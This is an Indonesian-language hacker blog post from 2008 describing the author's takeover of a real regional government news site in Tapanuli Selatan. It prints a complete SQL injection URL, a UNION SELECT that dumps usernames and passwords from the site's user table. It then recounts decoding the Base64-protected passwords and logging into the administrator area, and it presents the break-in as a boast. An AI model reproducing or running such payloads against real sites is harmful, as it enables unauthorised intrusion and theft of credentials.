<(o)-(Back)--<

 

WWW.SPYROZONE.NET

  

 
[276]. Government Site: Takeover Website Tab.Pijar Pembaharuan - Tapanuli Selatan

    

  

-----------------------------------------------------------------------------------

Author  : SPYRO KiD

Contact : admin[~@~]spyrozone.net

CopyLEFT (c) 2008 www.spyrozone.net All Rights Reserved

17/12/2008 15.18.23 WIB

-----------------------------------------------------------------------------------

  

  

Lagi-lagi SQL Injection pada website pemerintah. Website ini merupakan website Tabloid Pijar Pembaharuan Online yang merupakan anak dari situs resmi Tapanuli Selatan. Website ini pernah memuat berita bahwa 50% website pemerintah rawan serangan Hacker, terutama dengan SQL Injection. Namun ironisnya, pada wensite ini sendiri ternyata terdapat bug SQL Injection.. hehehe.. ^_^


http://tapselkab.go.id/tapsel/?pilih=lihat&id=-1 union select 1,group_concat(user,0x2d2d,password),database(),user(),5,connection_id(),7 from user




Hasilnya agak mengejutkan saya. Ternyata passwordnya diproteksi hanya dengan menggunakan Base64:






Mudah saja untuk mendecode password tersebut. Area login untuk Admin ditunjukkan dengan jelas oleh webmaster sendiri sehingga akhirnya saya bisa memasuki area Administrator dengan Account yang saya peroleh tadi:


 

/* ------------------------------|EOF|------------------------------ */

 

  <(o)-(Back)--<   

 WWW.SPYROZONE.NET